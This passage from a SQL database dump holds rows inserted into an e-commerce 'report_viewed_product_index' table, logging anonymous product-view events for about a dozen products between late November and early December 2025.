(22203, NULL, NULL, 2064, 1, '2025-11-20 07:36:35'),
(22204, NULL, NULL, 2064, 1, '2025-11-20 07:51:05'),
(22205, NULL, NULL, 2062, 1, '2025-11-20 08:21:52'),
(22206, NULL, NULL, 2061, 1, '2025-11-20 08:24:08'),
(22207, NULL, NULL, 2063, 1, '2025-11-20 08:43:08'),
(22208, NULL, NULL, 2054, 1, '2025-11-20 08:48:36'),
(22209, NULL, NULL, 2061, 1, '2025-11-20 08:56:21'),
(22210, NULL, NULL, 2062, 1, '2025-11-20 08:56:21'),
(22211, NULL, NULL, 2062, 1, '2025-11-20 09:30:44'),
(22212, NULL, NULL, 2061, 1, '2025-11-20 09:31:14'),
(22213, NULL, NULL, 2062, 1, '2025-11-20 09:58:04'),
(22214, NULL, NULL, 2061, 1, '2025-11-20 10:05:17'),
(22215, NULL, NULL, 2062, 1, '2025-11-20 10:05:23'),
(22216, NULL, NULL, 2060, 1, '2025-11-20 10:40:45'),
(22217, NULL, NULL, 2062, 1, '2025-11-20 11:03:52'),
(22218, NULL, NULL, 2059, 1, '2025-11-20 11:24:04'),
(22219, NULL, NULL, 2062, 1, '2025-11-20 13:45:34'),
(22220, NULL, NULL, 2062, 1, '2025-11-20 14:00:02'),
(22221, NULL, NULL, 2062, 1, '2025-11-20 14:26:20'),
(22222, NULL, NULL, 2064, 1, '2025-11-20 14:38:29'),
(22223, NULL, NULL, 2063, 1, '2025-11-20 14:39:31'),
(22224, NULL, NULL, 2058, 1, '2025-11-20 14:45:22'),
(22225, NULL, NULL, 2064, 1, '2025-11-20 14:46:26'),
(22226, NULL, NULL, 2055, 1, '2025-11-20 15:12:10'),
(22227, NULL, NULL, 2064, 1, '2025-11-20 15:15:39'),
(22228, NULL, NULL, 2062, 1, '2025-11-20 15:20:36'),
(22229, NULL, NULL, 2062, 1, '2025-11-20 15:22:31'),
(22230, NULL, NULL, 2060, 1, '2025-11-20 15:25:35'),
(22231, NULL, NULL, 2061, 1, '2025-11-20 15:40:22'),
(22232, NULL, NULL, 2064, 1, '2025-11-20 15:41:01'),
(22233, NULL, NULL, 2058, 1, '2025-11-20 15:45:25'),
(22234, NULL, NULL, 2064, 1, '2025-11-20 15:51:25'),
(22235, NULL, NULL, 2062, 1, '2025-11-20 16:14:33'),
(22236, NULL, NULL, 2062, 1, '2025-11-20 16:16:52'),
(22237, NULL, NULL, 2064, 1, '2025-11-20 16:41:13'),
(22238, NULL, NULL, 2054, 1, '2025-11-20 17:08:08'),
(22239, NULL, NULL, 2064, 1, '2025-11-20 17:35:26'),
(22240, NULL, NULL, 2059, 1, '2025-11-20 17:35:40'),
(22241, NULL, NULL, 2064, 1, '2025-11-20 17:37:00'),
(22242, NULL, NULL, 2059, 1, '2025-11-20 17:51:06'),
(22243, NULL, NULL, 2058, 1, '2025-11-20 19:51:53'),
(22244, NULL, NULL, 2063, 1, '2025-11-20 22:46:40'),
(22245, NULL, NULL, 2061, 1, '2025-11-20 22:46:44'),
(22246, NULL, NULL, 2062, 1, '2025-11-20 22:46:48'),
(22247, NULL, NULL, 2053, 1, '2025-11-21 00:24:03'),
(22248, NULL, NULL, 2054, 1, '2025-11-21 02:23:13'),
(22249, NULL, NULL, 2064, 1, '2025-11-21 05:15:35'),
(22250, NULL, NULL, 2060, 1, '2025-11-21 06:19:10'),
(22251, NULL, NULL, 2054, 1, '2025-11-21 09:53:21'),
(22252, NULL, NULL, 2064, 1, '2025-11-21 14:04:00'),
(22253, NULL, NULL, 2064, 1, '2025-11-21 15:22:59'),
(22254, NULL, NULL, 2058, 1, '2025-11-21 15:32:37'),
(22255, NULL, NULL, 2064, 1, '2025-11-21 17:48:28'),
(22256, NULL, NULL, 2062, 1, '2025-11-21 18:02:26'),
(22257, NULL, NULL, 2064, 1, '2025-11-21 18:03:45'),
(22258, NULL, NULL, 2054, 1, '2025-11-21 18:09:57'),
(22259, NULL, NULL, 2054, 1, '2025-11-21 19:29:39'),
(22260, NULL, NULL, 2060, 1, '2025-11-21 20:20:19'),
(22261, NULL, NULL, 2060, 1, '2025-11-21 20:32:52'),
(22262, NULL, NULL, 2064, 1, '2025-11-21 21:51:33'),
(22263, NULL, NULL, 2054, 1, '2025-11-21 23:55:13'),
(22264, NULL, NULL, 2055, 1, '2025-11-22 02:09:04'),
(22265, NULL, NULL, 2058, 1, '2025-11-22 04:26:20'),
(22266, NULL, NULL, 2064, 1, '2025-11-22 06:00:30'),
(22267, NULL, NULL, 2063, 1, '2025-11-22 07:26:59'),
(22268, NULL, NULL, 2054, 1, '2025-11-22 08:27:50'),
(22269, NULL, NULL, 2058, 1, '2025-11-22 08:39:50'),
(22270, NULL, NULL, 2060, 1, '2025-11-22 09:30:47'),
(22271, NULL, NULL, 2055, 1, '2025-11-22 11:50:46'),
(22272, NULL, NULL, 2063, 1, '2025-11-22 14:46:50'),
(22273, NULL, NULL, 2062, 1, '2025-11-22 14:59:11'),
(22274, NULL, NULL, 2064, 1, '2025-11-22 15:20:43'),
(22275, NULL, NULL, 2064, 1, '2025-11-22 15:24:28'),
(22276, NULL, NULL, 2055, 1, '2025-11-22 15:45:48'),
(22277, NULL, NULL, 2064, 1, '2025-11-22 17:07:53'),
(22278, NULL, NULL, 2061, 1, '2025-11-22 17:32:34'),
(22279, NULL, NULL, 2058, 1, '2025-11-22 17:42:27'),
(22280, NULL, NULL, 2054, 1, '2025-11-22 17:44:17'),
(22281, NULL, NULL, 2058, 1, '2025-11-22 18:57:22'),
(22282, NULL, NULL, 2064, 1, '2025-11-22 19:53:24'),
(22283, NULL, NULL, 2060, 1, '2025-11-22 20:20:03'),
(22284, NULL, NULL, 2054, 1, '2025-11-22 21:43:15'),
(22285, NULL, NULL, 2060, 1, '2025-11-22 22:04:21'),
(22286, NULL, NULL, 2054, 1, '2025-11-22 23:02:59'),
(22287, NULL, NULL, 2064, 1, '2025-11-23 04:38:10'),
(22288, NULL, NULL, 2060, 1, '2025-11-23 05:30:43'),
(22289, NULL, NULL, 2054, 1, '2025-11-23 06:54:54'),
(22290, NULL, NULL, 2060, 1, '2025-11-23 06:59:01'),
(22291, NULL, NULL, 2059, 1, '2025-11-23 06:59:11'),
(22292, NULL, NULL, 2054, 1, '2025-11-23 09:32:33'),
(22293, NULL, NULL, 2064, 1, '2025-11-23 09:41:25'),
(22294, NULL, NULL, 2064, 1, '2025-11-23 10:38:13'),
(22295, NULL, NULL, 2064, 1, '2025-11-23 11:04:38'),
(22296, NULL, NULL, 2063, 1, '2025-11-23 11:14:20'),
(22297, NULL, NULL, 2062, 1, '2025-11-23 12:34:13'),
(22298, NULL, NULL, 2064, 1, '2025-11-23 12:43:53'),
(22299, NULL, NULL, 2064, 1, '2025-11-23 13:37:19'),
(22300, NULL, NULL, 2059, 1, '2025-11-23 13:43:23'),
(22301, NULL, NULL, 2054, 1, '2025-11-23 14:27:44'),
(22302, NULL, NULL, 2064, 1, '2025-11-23 18:13:32'),
(22303, NULL, NULL, 2064, 1, '2025-11-23 18:20:34'),
(22304, NULL, NULL, 2062, 1, '2025-11-23 18:21:01'),
(22305, NULL, NULL, 2054, 1, '2025-11-23 18:25:54'),
(22306, NULL, NULL, 2062, 1, '2025-11-23 18:35:27'),
(22307, NULL, NULL, 2063, 1, '2025-11-23 18:40:08'),
(22308, NULL, NULL, 2060, 1, '2025-11-23 18:53:25'),
(22309, NULL, NULL, 2054, 1, '2025-11-23 19:25:06'),
(22310, NULL, NULL, 2060, 1, '2025-11-23 19:32:54'),
(22311, NULL, NULL, 2058, 1, '2025-11-23 20:30:28'),
(22312, NULL, NULL, 2060, 1, '2025-11-23 23:57:43'),
(22313, NULL, NULL, 2054, 1, '2025-11-24 00:10:28'),
(22314, NULL, NULL, 2064, 1, '2025-11-24 00:48:21'),
(22315, NULL, NULL, 2064, 1, '2025-11-24 00:48:22'),
(22316, NULL, NULL, 2064, 1, '2025-11-24 01:01:52'),
(22317, NULL, NULL, 2064, 1, '2025-11-24 02:27:52'),
(22318, NULL, NULL, 2055, 1, '2025-11-24 02:58:16'),
(22319, NULL, NULL, 2055, 1, '2025-11-24 03:10:26'),
(22320, NULL, NULL, 2054, 1, '2025-11-24 03:19:56'),
(22321, NULL, NULL, 2063, 1, '2025-11-24 04:04:07'),
(22322, NULL, NULL, 2061, 1, '2025-11-24 04:16:32'),
(22323, NULL, NULL, 2061, 1, '2025-11-24 04:16:33'),
(22324, NULL, NULL, 2061, 1, '2025-11-24 04:26:37'),
(22325, NULL, NULL, 2059, 1, '2025-11-24 04:27:14'),
(22326, NULL, NULL, 2053, 1, '2025-11-24 06:17:21'),
(22327, NULL, NULL, 2058, 1, '2025-11-24 06:23:00'),
(22328, NULL, NULL, 2054, 1, '2025-11-24 07:17:29'),
(22329, NULL, NULL, 2060, 1, '2025-11-24 07:18:00'),
(22330, NULL, NULL, 2064, 1, '2025-11-24 09:19:16'),
(22331, NULL, NULL, 2064, 1, '2025-11-24 10:00:03'),
(22332, NULL, NULL, 2064, 1, '2025-11-24 10:54:01'),
(22333, NULL, NULL, 2054, 1, '2025-11-24 10:59:03'),
(22334, NULL, NULL, 2062, 1, '2025-11-24 18:00:35'),
(22335, NULL, NULL, 2054, 1, '2025-11-24 18:11:01'),
(22336, NULL, NULL, 2060, 1, '2025-11-24 19:02:10'),
(22337, NULL, NULL, 2062, 1, '2025-11-24 19:06:16'),
(22338, NULL, NULL, 2064, 1, '2025-11-24 19:07:31'),
(22339, NULL, NULL, 2054, 1, '2025-11-24 19:47:31'),
(22340, NULL, NULL, 2058, 1, '2025-11-24 19:47:36'),
(22341, NULL, NULL, 2061, 1, '2025-11-24 20:00:01'),
(22342, NULL, NULL, 2059, 1, '2025-11-24 20:00:05'),
(22343, NULL, NULL, 2061, 1, '2025-11-24 20:00:10'),
(22344, NULL, NULL, 2055, 1, '2025-11-24 20:00:13'),
(22345, NULL, NULL, 2059, 1, '2025-11-24 20:00:13'),
(22346, NULL, NULL, 2062, 1, '2025-11-24 20:00:14'),
(22347, NULL, NULL, 2059, 1, '2025-11-24 20:00:17'),
(22348, NULL, NULL, 2064, 1, '2025-11-24 20:00:18'),
(22349, NULL, NULL, 2064, 1, '2025-11-24 20:00:18'),
(22350, NULL, NULL, 2063, 1, '2025-11-24 20:00:20'),
(22351, NULL, NULL, 2061, 1, '2025-11-24 20:00:20'),
(22352, NULL, NULL, 2061, 1, '2025-11-24 20:00:20'),
(22353, NULL, NULL, 2061, 1, '2025-11-24 20:00:20'),
(22354, NULL, NULL, 2061, 1, '2025-11-24 20:00:21'),
(22355, NULL, NULL, 2061, 1, '2025-11-24 20:00:21'),
(22356, NULL, NULL, 2061, 1, '2025-11-24 20:00:21'),
(22357, NULL, NULL, 2061, 1, '2025-11-24 20:00:21'),
(22358, NULL, NULL, 2055, 1, '2025-11-24 20:00:25'),
(22359, NULL, NULL, 2063, 1, '2025-11-24 20:00:26'),
(22360, NULL, NULL, 2061, 1, '2025-11-24 20:00:27'),
(22361, NULL, NULL, 2061, 1, '2025-11-24 20:00:27'),
(22362, NULL, NULL, 2061, 1, '2025-11-24 20:00:27'),
(22363, NULL, NULL, 2061, 1, '2025-11-24 20:00:27'),
(22364, NULL, NULL, 2061, 1, '2025-11-24 20:00:27'),
(22365, NULL, NULL, 2061, 1, '2025-11-24 20:00:27'),
(22366, NULL, NULL, 2061, 1, '2025-11-24 20:00:28');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(22367, NULL, NULL, 2062, 1, '2025-11-24 20:00:28'),
(22368, NULL, NULL, 2062, 1, '2025-11-24 20:00:29'),
(22369, NULL, NULL, 2062, 1, '2025-11-24 20:00:29'),
(22370, NULL, NULL, 2062, 1, '2025-11-24 20:00:29'),
(22371, NULL, NULL, 2062, 1, '2025-11-24 20:00:29'),
(22372, NULL, NULL, 2062, 1, '2025-11-24 20:00:29'),
(22373, NULL, NULL, 2062, 1, '2025-11-24 20:00:29'),
(22374, NULL, NULL, 2058, 1, '2025-11-24 20:00:30'),
(22375, NULL, NULL, 2062, 1, '2025-11-24 20:00:30'),
(22376, NULL, NULL, 2064, 1, '2025-11-24 20:00:36'),
(22377, NULL, NULL, 2060, 1, '2025-11-24 20:00:41'),
(22378, NULL, NULL, 2064, 1, '2025-11-24 20:00:42'),
(22379, NULL, NULL, 2064, 1, '2025-11-24 20:00:43'),
(22380, NULL, NULL, 2054, 1, '2025-11-24 20:00:43'),
(22381, NULL, NULL, 2064, 1, '2025-11-24 20:00:45'),
(22382, NULL, NULL, 2062, 1, '2025-11-24 20:00:47'),
(22383, NULL, NULL, 2058, 1, '2025-11-24 20:00:47'),
(22384, NULL, NULL, 2062, 1, '2025-11-24 20:00:47'),
(22385, NULL, NULL, 2062, 1, '2025-11-24 20:00:47'),
(22386, NULL, NULL, 2064, 1, '2025-11-24 20:00:48'),
(22387, NULL, NULL, 2060, 1, '2025-11-24 20:00:48'),
(22388, NULL, NULL, 2054, 1, '2025-11-24 20:00:49'),
(22389, NULL, NULL, 2062, 1, '2025-11-24 20:00:55'),
(22390, NULL, NULL, 2062, 1, '2025-11-24 20:00:55'),
(22391, NULL, NULL, 2062, 1, '2025-11-24 20:00:56'),
(22392, NULL, NULL, 2054, 1, '2025-11-24 21:27:42'),
(22393, NULL, NULL, 2061, 1, '2025-11-24 21:54:42'),
(22394, NULL, NULL, 2064, 1, '2025-11-24 23:24:11'),
(22395, NULL, NULL, 2064, 1, '2025-11-24 23:36:06'),
(22396, NULL, NULL, 2064, 1, '2025-11-25 00:37:24'),
(22397, NULL, NULL, 2060, 1, '2025-11-25 01:35:00'),
(22398, NULL, NULL, 2053, 1, '2025-11-25 01:56:35'),
(22399, NULL, NULL, 2059, 1, '2025-11-25 06:11:44'),
(22400, NULL, NULL, 2059, 1, '2025-11-25 07:15:47'),
(22401, NULL, NULL, 2060, 1, '2025-11-25 10:18:18'),
(22402, NULL, NULL, 2054, 1, '2025-11-25 10:46:27'),
(22403, NULL, NULL, 2054, 1, '2025-11-25 11:04:01'),
(22404, NULL, NULL, 2060, 1, '2025-11-25 11:05:17'),
(22405, NULL, NULL, 2060, 1, '2025-11-25 11:43:40'),
(22406, NULL, NULL, 2054, 1, '2025-11-25 11:44:19'),
(22407, NULL, NULL, 2059, 1, '2025-11-25 11:44:39'),
(22408, NULL, NULL, 2064, 1, '2025-11-25 11:44:50'),
(22409, NULL, NULL, 2064, 1, '2025-11-25 13:28:26'),
(22410, NULL, NULL, 2060, 1, '2025-11-25 14:02:07'),
(22411, NULL, NULL, 2054, 1, '2025-11-25 16:16:58'),
(22412, NULL, NULL, 2064, 1, '2025-11-25 18:00:28'),
(22413, NULL, NULL, 2054, 1, '2025-11-25 19:16:49'),
(22414, NULL, NULL, 2064, 1, '2025-11-25 19:28:16'),
(22415, NULL, NULL, 2064, 1, '2025-11-25 20:14:25'),
(22416, NULL, NULL, 2060, 1, '2025-11-25 23:44:45'),
(22417, NULL, NULL, 2063, 1, '2025-11-26 00:40:34'),
(22418, NULL, NULL, 2054, 1, '2025-11-26 01:16:52'),
(22419, NULL, NULL, 2060, 1, '2025-11-26 03:47:46'),
(22420, NULL, NULL, 2064, 1, '2025-11-26 03:54:14'),
(22421, NULL, NULL, 2061, 1, '2025-11-26 07:12:28'),
(22422, NULL, NULL, 2053, 1, '2025-11-26 08:49:11'),
(22423, NULL, NULL, 2059, 1, '2025-11-26 09:16:19'),
(22424, NULL, NULL, 2058, 1, '2025-11-26 09:30:49'),
(22425, NULL, NULL, 2064, 1, '2025-11-26 14:45:27'),
(22426, NULL, NULL, 2060, 1, '2025-11-26 15:20:33'),
(22427, NULL, NULL, 2054, 1, '2025-11-26 15:47:57'),
(22428, NULL, NULL, 2054, 1, '2025-11-26 16:06:38'),
(22429, NULL, NULL, 2064, 1, '2025-11-26 16:41:45'),
(22430, NULL, NULL, 2060, 1, '2025-11-26 17:47:05'),
(22431, NULL, NULL, 2060, 1, '2025-11-26 17:50:29'),
(22432, NULL, NULL, 2059, 1, '2025-11-26 18:13:06'),
(22433, NULL, NULL, 2064, 1, '2025-11-26 21:29:48'),
(22434, NULL, NULL, 2058, 1, '2025-11-26 22:06:27'),
(22435, NULL, NULL, 2064, 1, '2025-11-26 23:21:19'),
(22436, NULL, NULL, 2058, 1, '2025-11-27 02:07:10'),
(22437, NULL, NULL, 2060, 1, '2025-11-27 02:31:20'),
(22438, NULL, NULL, 2061, 1, '2025-11-27 04:42:23'),
(22439, NULL, NULL, 2054, 1, '2025-11-27 05:04:49'),
(22440, NULL, NULL, 2060, 1, '2025-11-27 06:59:08'),
(22441, NULL, NULL, 2054, 1, '2025-11-27 08:35:35'),
(22442, NULL, NULL, 2064, 1, '2025-11-27 10:07:09'),
(22443, NULL, NULL, 2063, 1, '2025-11-27 10:07:09'),
(22444, NULL, NULL, 2062, 1, '2025-11-27 10:07:11'),
(22445, NULL, NULL, 2061, 1, '2025-11-27 10:07:11'),
(22446, NULL, NULL, 2060, 1, '2025-11-27 10:07:11'),
(22447, NULL, NULL, 2059, 1, '2025-11-27 10:07:11'),
(22448, NULL, NULL, 2058, 1, '2025-11-27 10:07:12'),
(22449, NULL, NULL, 2055, 1, '2025-11-27 10:07:12'),
(22450, NULL, NULL, 2054, 1, '2025-11-27 10:07:13'),
(22451, NULL, NULL, 2058, 1, '2025-11-27 10:45:38'),
(22452, NULL, NULL, 2058, 1, '2025-11-27 10:45:53'),
(22453, NULL, NULL, 2064, 1, '2025-11-27 15:44:36'),
(22454, NULL, NULL, 2064, 1, '2025-11-27 15:55:52'),
(22455, NULL, NULL, 2064, 1, '2025-11-27 16:42:06'),
(22456, NULL, NULL, 2060, 1, '2025-11-27 16:55:22'),
(22457, NULL, NULL, 2062, 1, '2025-11-27 16:58:10'),
(22458, NULL, NULL, 2063, 1, '2025-11-27 16:59:29'),
(22459, NULL, NULL, 2064, 1, '2025-11-27 16:59:39'),
(22460, NULL, NULL, 2058, 1, '2025-11-27 17:10:10'),
(22461, NULL, NULL, 2055, 1, '2025-11-27 17:39:39'),
(22462, NULL, NULL, 2058, 1, '2025-11-27 18:14:20'),
(22463, NULL, NULL, 2064, 1, '2025-11-27 18:14:33'),
(22464, NULL, NULL, 2062, 1, '2025-11-27 18:14:54'),
(22465, NULL, NULL, 2055, 1, '2025-11-27 18:14:57'),
(22466, NULL, NULL, 2059, 1, '2025-11-27 18:15:07'),
(22467, NULL, NULL, 2063, 1, '2025-11-27 18:15:09'),
(22468, NULL, NULL, 2061, 1, '2025-11-27 18:15:13'),
(22469, NULL, NULL, 2060, 1, '2025-11-27 18:15:20'),
(22470, NULL, NULL, 2054, 1, '2025-11-27 18:15:29'),
(22471, NULL, NULL, 2058, 1, '2025-11-27 18:16:03'),
(22472, NULL, NULL, 2054, 1, '2025-11-27 18:16:43'),
(22473, NULL, NULL, 2064, 1, '2025-11-27 18:16:48'),
(22474, NULL, NULL, 2062, 1, '2025-11-27 18:17:08'),
(22475, NULL, NULL, 2055, 1, '2025-11-27 18:17:12'),
(22476, NULL, NULL, 2059, 1, '2025-11-27 18:17:31'),
(22477, NULL, NULL, 2063, 1, '2025-11-27 18:17:44'),
(22478, NULL, NULL, 2060, 1, '2025-11-27 18:17:48'),
(22479, NULL, NULL, 2061, 1, '2025-11-27 18:17:54'),
(22480, NULL, NULL, 2053, 1, '2025-11-27 18:18:10'),
(22481, NULL, NULL, 2061, 1, '2025-11-27 18:18:46'),
(22482, NULL, NULL, 2064, 1, '2025-11-27 18:24:16'),
(22483, NULL, NULL, 2062, 1, '2025-11-27 18:38:38'),
(22484, NULL, NULL, 2054, 1, '2025-11-27 19:09:45'),
(22485, NULL, NULL, 2054, 1, '2025-11-27 19:12:30'),
(22486, NULL, NULL, 2059, 1, '2025-11-27 19:18:02'),
(22487, NULL, NULL, 2064, 1, '2025-11-27 19:22:37'),
(22488, NULL, NULL, 2061, 1, '2025-11-27 19:34:13'),
(22489, NULL, NULL, 2061, 1, '2025-11-27 19:47:36'),
(22490, NULL, NULL, 2058, 1, '2025-11-27 19:56:26'),
(22491, NULL, NULL, 2062, 1, '2025-11-27 20:28:24'),
(22492, NULL, NULL, 2054, 1, '2025-11-27 20:37:02'),
(22493, NULL, NULL, 2060, 1, '2025-11-27 20:45:37'),
(22494, NULL, NULL, 2063, 1, '2025-11-27 20:49:28'),
(22495, NULL, NULL, 2058, 1, '2025-11-27 20:59:08'),
(22496, NULL, NULL, 2055, 1, '2025-11-27 21:27:01'),
(22497, NULL, NULL, 2060, 1, '2025-11-27 21:32:31'),
(22498, NULL, NULL, 2061, 1, '2025-11-27 22:03:19'),
(22499, NULL, NULL, 2062, 1, '2025-11-27 22:22:10'),
(22500, NULL, NULL, 2054, 1, '2025-11-27 22:54:48'),
(22501, NULL, NULL, 2059, 1, '2025-11-27 22:59:59'),
(22502, NULL, NULL, 2062, 1, '2025-11-27 23:02:08'),
(22503, NULL, NULL, 2061, 1, '2025-11-27 23:02:12'),
(22504, NULL, NULL, 2063, 1, '2025-11-27 23:02:16'),
(22505, NULL, NULL, 2064, 1, '2025-11-27 23:04:30'),
(22506, NULL, NULL, 2060, 1, '2025-11-27 23:20:26'),
(22507, NULL, NULL, 2063, 1, '2025-11-27 23:24:50'),
(22508, NULL, NULL, 2058, 1, '2025-11-27 23:36:01'),
(22509, NULL, NULL, 2055, 1, '2025-11-28 00:07:07'),
(22510, NULL, NULL, 2061, 1, '2025-11-28 00:48:36'),
(22511, NULL, NULL, 2062, 1, '2025-11-28 01:10:20'),
(22512, NULL, NULL, 2054, 1, '2025-11-28 01:38:35'),
(22513, NULL, NULL, 2054, 1, '2025-11-28 01:47:16'),
(22514, NULL, NULL, 2059, 1, '2025-11-28 01:53:31'),
(22515, NULL, NULL, 2064, 1, '2025-11-28 01:58:37'),
(22516, NULL, NULL, 2060, 1, '2025-11-28 03:39:28'),
(22517, NULL, NULL, 2061, 1, '2025-11-28 03:49:31'),
(22518, NULL, NULL, 2064, 1, '2025-11-28 05:13:36'),
(22519, NULL, NULL, 2061, 1, '2025-11-28 06:12:39'),
(22520, NULL, NULL, 2060, 1, '2025-11-28 06:16:24'),
(22521, NULL, NULL, 2063, 1, '2025-11-28 06:49:18'),
(22522, NULL, NULL, 2055, 1, '2025-11-28 07:16:33'),
(22523, NULL, NULL, 2064, 1, '2025-11-28 07:28:42'),
(22524, NULL, NULL, 2062, 1, '2025-11-28 07:31:25'),
(22525, NULL, NULL, 2058, 1, '2025-11-28 09:04:40'),
(22526, NULL, NULL, 2060, 1, '2025-11-28 09:06:42'),
(22527, NULL, NULL, 2064, 1, '2025-11-28 09:07:51'),
(22528, NULL, NULL, 2064, 1, '2025-11-28 09:16:22'),
(22529, NULL, NULL, 2064, 1, '2025-11-28 09:24:29'),
(22530, NULL, NULL, 2060, 1, '2025-11-28 09:36:35'),
(22531, NULL, NULL, 2063, 1, '2025-11-28 10:16:16'),
(22532, NULL, NULL, 2054, 1, '2025-11-28 10:49:34'),
(22533, NULL, NULL, 2064, 1, '2025-11-28 11:13:32'),
(22534, NULL, NULL, 2064, 1, '2025-11-28 15:54:22'),
(22535, NULL, NULL, 2055, 1, '2025-11-28 16:41:16'),
(22536, NULL, NULL, 2054, 1, '2025-11-28 16:46:29'),
(22537, NULL, NULL, 2064, 1, '2025-11-28 18:38:44'),
(22538, NULL, NULL, 2054, 1, '2025-11-28 18:53:02'),
(22539, NULL, NULL, 2054, 1, '2025-11-28 19:31:14'),
(22540, NULL, NULL, 2054, 1, '2025-11-28 20:29:30'),
(22541, NULL, NULL, 2059, 1, '2025-11-28 21:02:19'),
(22542, NULL, NULL, 2054, 1, '2025-11-28 21:51:57'),
(22543, NULL, NULL, 2064, 1, '2025-11-28 22:39:37'),
(22544, NULL, NULL, 2060, 1, '2025-11-28 22:40:17'),
(22545, NULL, NULL, 2064, 1, '2025-11-29 00:30:18'),
(22546, NULL, NULL, 2059, 1, '2025-11-29 00:50:33'),
(22547, NULL, NULL, 2060, 1, '2025-11-29 01:09:55'),
(22548, NULL, NULL, 2054, 1, '2025-11-29 02:03:44'),
(22549, NULL, NULL, 2062, 1, '2025-11-29 02:08:38'),
(22550, NULL, NULL, 2060, 1, '2025-11-29 02:52:28'),
(22551, NULL, NULL, 2064, 1, '2025-11-29 03:51:52'),
(22552, NULL, NULL, 2055, 1, '2025-11-29 04:02:03'),
(22553, NULL, NULL, 2061, 1, '2025-11-29 04:36:09'),
(22554, NULL, NULL, 2058, 1, '2025-11-29 05:33:00'),
(22555, NULL, NULL, 2061, 1, '2025-11-29 05:42:23'),
(22556, NULL, NULL, 2055, 1, '2025-11-29 11:17:12'),
(22557, NULL, NULL, 2060, 1, '2025-11-29 12:07:27'),
(22558, NULL, NULL, 2055, 1, '2025-11-29 12:08:00'),
(22559, NULL, NULL, 2064, 1, '2025-11-29 13:37:26'),
(22560, NULL, NULL, 2062, 1, '2025-11-29 13:38:19'),
(22561, NULL, NULL, 2064, 1, '2025-11-29 15:37:55'),
(22562, NULL, NULL, 2061, 1, '2025-11-29 16:57:05'),
(22563, NULL, NULL, 2054, 1, '2025-11-29 17:30:31'),
(22564, NULL, NULL, 2060, 1, '2025-11-29 18:31:58'),
(22565, NULL, NULL, 2054, 1, '2025-11-29 18:34:56'),
(22566, NULL, NULL, 2064, 1, '2025-11-29 19:40:07'),
(22567, NULL, NULL, 2054, 1, '2025-11-30 00:26:54'),
(22568, NULL, NULL, 2064, 1, '2025-11-30 00:47:14'),
(22569, NULL, NULL, 2061, 1, '2025-11-30 01:19:35'),
(22570, NULL, NULL, 2053, 1, '2025-11-30 02:50:11'),
(22571, NULL, NULL, 2064, 1, '2025-11-30 05:46:57'),
(22572, NULL, NULL, 2054, 1, '2025-11-30 05:52:13'),
(22573, NULL, NULL, 2060, 1, '2025-11-30 06:49:18'),
(22574, NULL, NULL, 2059, 1, '2025-11-30 06:49:25'),
(22575, NULL, NULL, 2059, 1, '2025-11-30 07:29:21'),
(22576, NULL, NULL, 2058, 1, '2025-11-30 07:32:59'),
(22577, NULL, NULL, 2064, 1, '2025-11-30 07:39:10'),
(22578, NULL, NULL, 2060, 1, '2025-11-30 08:02:17'),
(22579, NULL, NULL, 2062, 1, '2025-11-30 08:22:29'),
(22580, NULL, NULL, 2063, 1, '2025-11-30 08:31:23'),
(22581, NULL, NULL, 2062, 1, '2025-11-30 10:45:23'),
(22582, NULL, NULL, 2064, 1, '2025-11-30 11:46:21'),
(22583, NULL, NULL, 2063, 1, '2025-11-30 13:28:12'),
(22584, NULL, NULL, 2055, 1, '2025-11-30 13:28:16'),
(22585, NULL, NULL, 2060, 1, '2025-11-30 13:38:09'),
(22586, NULL, NULL, 2063, 1, '2025-11-30 13:49:48'),
(22587, NULL, NULL, 2064, 1, '2025-11-30 17:30:07'),
(22588, NULL, NULL, 2062, 1, '2025-11-30 18:38:33'),
(22589, NULL, NULL, 2064, 1, '2025-11-30 18:40:01'),
(22590, NULL, NULL, 2054, 1, '2025-11-30 19:29:21'),
(22591, NULL, NULL, 2062, 1, '2025-11-30 19:50:50'),
(22592, NULL, NULL, 2054, 1, '2025-11-30 21:17:39'),
(22593, NULL, NULL, 2053, 1, '2025-11-30 22:15:28'),
(22594, NULL, NULL, 2062, 1, '2025-11-30 22:32:07'),
(22595, NULL, NULL, 2058, 1, '2025-12-01 04:53:55'),
(22596, NULL, NULL, 2064, 1, '2025-12-01 06:06:35'),
(22597, NULL, NULL, 2054, 1, '2025-12-01 06:07:52'),
(22598, NULL, NULL, 2053, 1, '2025-12-01 06:11:09'),
(22599, NULL, NULL, 2064, 1, '2025-12-01 07:34:09'),
(22600, NULL, NULL, 2062, 1, '2025-12-01 07:43:22'),
(22601, NULL, NULL, 2059, 1, '2025-12-01 07:51:50'),
(22602, NULL, NULL, 2060, 1, '2025-12-01 07:53:53'),
(22603, NULL, NULL, 2060, 1, '2025-12-01 09:00:21'),
(22604, NULL, NULL, 2064, 1, '2025-12-01 17:07:04'),
(22605, NULL, NULL, 2054, 1, '2025-12-01 19:50:27'),
(22606, NULL, NULL, 2058, 1, '2025-12-01 19:50:32'),
(22607, NULL, NULL, 2054, 1, '2025-12-01 20:04:38'),
(22608, NULL, NULL, 2064, 1, '2025-12-01 20:53:36'),
(22609, NULL, NULL, 2060, 1, '2025-12-01 21:59:53'),
(22610, NULL, NULL, 2060, 1, '2025-12-01 22:13:51'),
(22611, NULL, NULL, 2064, 1, '2025-12-02 00:33:22'),
(22612, NULL, NULL, 2059, 1, '2025-12-02 02:39:53'),
(22613, NULL, NULL, 2053, 1, '2025-12-02 03:06:14'),
(22614, NULL, NULL, 2054, 1, '2025-12-02 06:10:46'),
(22615, NULL, NULL, 2054, 1, '2025-12-02 09:06:51'),
(22616, NULL, NULL, 2060, 1, '2025-12-02 09:34:52'),
(22617, NULL, NULL, 2060, 1, '2025-12-02 09:51:26'),
(22618, NULL, NULL, 2060, 1, '2025-12-02 13:42:45'),
(22619, NULL, NULL, 2064, 1, '2025-12-02 14:34:20'),
(22620, NULL, NULL, 2054, 1, '2025-12-02 15:14:01'),
(22621, NULL, NULL, 2064, 1, '2025-12-02 15:53:19'),
(22622, NULL, NULL, 2064, 1, '2025-12-02 17:04:27'),
(22623, NULL, NULL, 2061, 1, '2025-12-02 17:56:24'),
(22624, NULL, NULL, 2062, 1, '2025-12-02 19:29:58'),
(22625, NULL, NULL, 2064, 1, '2025-12-02 20:13:25'),
(22626, NULL, NULL, 2064, 1, '2025-12-02 20:31:41'),
(22627, NULL, NULL, 2063, 1, '2025-12-02 20:41:53'),
(22628, NULL, NULL, 2054, 1, '2025-12-02 20:54:47'),
